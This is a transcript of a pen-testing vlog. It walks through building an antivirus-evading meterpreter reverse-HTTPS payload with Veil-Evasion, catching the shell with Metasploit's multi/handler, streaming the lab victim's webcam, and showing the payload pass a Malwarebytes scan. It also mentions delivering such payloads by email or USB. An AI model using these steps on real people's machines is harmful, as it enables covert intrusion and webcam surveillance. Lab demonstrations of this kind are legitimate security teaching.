G'day guys, Alex here. Welcome back. This is vlog number 2, following on from the vlog 1 where we set up the pen testing lab. So today we're going to be bypassing antivirus software and attacking our Windows 7 machine. And we're going to see if we can try and leverage the webcam service. So there's a lot of this going around at the moment. You notice some big guys in the industry like Mark Zuckerberg covering their webcam. So I'm going to be showing you the reason why they're doing that, and also just showing you that you shouldn't be relying too much on your antivirus software because they can be bypassed. This is a lot of fun. I love doing this and I love teaching this. So we're just going to go get stuck in. So right now all you're going to need is your Kali machine box with updated, and you want Veil-Evasion installed. I've put the commands above on how to do that in the post, and you're just going to need your Windows 7 machine. So first things first, if it's installed, we're just going to simply run Veil-Evasion in the terminal. If it's installed, we're just going to press no. Alright, so from here we're going to list our specific payloads. So all of these are masked payloads that we're going to use to bypass the antivirus. So the one in particular we're looking for today is the Go meterpreter reverse HTTPS, which is number 15. So in the menu here, we just type 15. Alright, so now it tells us we need to input some options. So right here there's no value, so that's what we need to fill out. So what we're going to do, open another terminal, figure out what our IP address is, 152.129. Alright, so we're going to go set lhost 192.168.152.129. Okay, so listening host is always the attacking box. Okay. So from here, we've filled out all of the options, so we're just going to type in generate. We're going to give it a name, so I'm just going to type in payload, press enter. So right now, this is going to craft our payload, and we're going to now send this across to the Windows 7 machine. So it tells us where the file was compiled to. And I'm going to copy that. Change directory. Alright, so we are going to go in here and I'm just going to move the payload to my web server. So in real life, you would be trying to social engineer this payload to somebody. You're going to be sending it via email or putting it on a USB stick and plugging it into the victim's computer. But for sake of ease and just to show you how this works, I'm just going to put this on my web server, and then I'm just going to access my web server from the Windows 7 machine. So for that, I'm just going to make sure my Apache server is running. Okay. And then we're going to switch over to the Windows 7 box. I'm going to jump on the internet here and access it. The payload.exe. Okay, here it is. We're going to save this. I'll save this to the desktop just for sake of ease. Okay, so once that's done, we'll close all that up. Okay, our payload is now successfully on the victim's machine. So we'll flick back to Kali machine, and we're going to run the metasploit framework. So all you have to do is type in msf console, and this takes a little while to open up, and then from here what we're going to do is set up a listener. So a listener will listen out for that Windows 7 machine payload to be executed. Once that's executed, it should connect back to our handler. So what we're going to do here is we're going to use exploit multi-handler. Okay, we're going to set a payload, Windows meterpreter reverse HTTPS, because reverse HTTPS is what we used in the payload. Just like Veil-Evasion, it has a set of options that we might need to fill out. So here we go. It says required. So yes, that's there. Yes, there's nothing there. Yes, it's been filled out. Okay, so all we need to do here is fill out the listening host. So set lhost 192.168.152.129. So remember, listening host is always us. Okay, and that's all we need to fill out. So then we type in exploit, and that will now listen out for our payload to be exploited. So executed, I should say, sorry. So we flick back, and so the unsuspecting victim is now going to click the payload that you've sent them. They're going to run it. And now if we flick back to our Kali machine, we now see that we've successfully connected and got a shell on the Windows 7 machine. So there's a whole bunch of commands we can type into the meterpreter that I won't be going into, but I will be going into a few of them in different tutorials. But the one we're going to be looking at mostly today is the webcam. So if we press help, we're going to be looking at all the different types of things we can do inside this shell. But one we're going to be looking at is the webcam stream. So right now, before I do this, because I'm actually recording with my webcam, I'm going to have to cut my webcam off and then reconnect it to the Windows 7 machine. In real life, obviously this wouldn't need to be done because they won't be recording like I am. So I'm just going to disconnect myself and I'm going to turn it on in the Windows 7 machine. So alright, so I've now gone and turned the webcam on in the Windows 7 machine. We'll flick back to the Kali machine and we'll type in webcam underscore stream. Alright, so now this is going to access the webcam on the Windows 7 box, which is obviously me. So you get to see me again. Hi guys, so this is how easy it is to actually access someone else's webcam if they have the service running. A lot of people that use their webcam tend to leave the webcam service running anyway, if they use things like Skype and all those kind of things. So this is the danger of having your webcam service running, obviously, and that's why a lot of the guys in the industry you'll find are covering their webcam for reasons specifically like this. So we also now, for the last part, is to look at why this was not picked up and how wasn't it picked up. So I'm gonna minimize this so you're not gonna see me for the rest of this. I've installed Malwarebytes, very famous antivirus software. What we're going to do is I'm going to scan the actual payload, malicious payload, with Malwarebytes to see if it gets picked up. So it's done a scan, it's going to start scanning it, and there we go. It was not picked up at all, threats detected 0. So this was not detected by a very famous antivirus software. So this is quite scary, but I'm very excited to show you guys this. I hope you guys have learned a lot. This is the first proper testing we've done with the lab we've set up, so I look forward to doing a few more with you guys. If you have any questions, just write it in the comments below and I'll try to get back to you. If you really liked it, please hit the like button, share, subscribe. We have a newsletter I'll be sending out weekly. Lots of interesting facts and news, so I look forward to that. So thanks for watching, guys, and I'll catch you on the next one.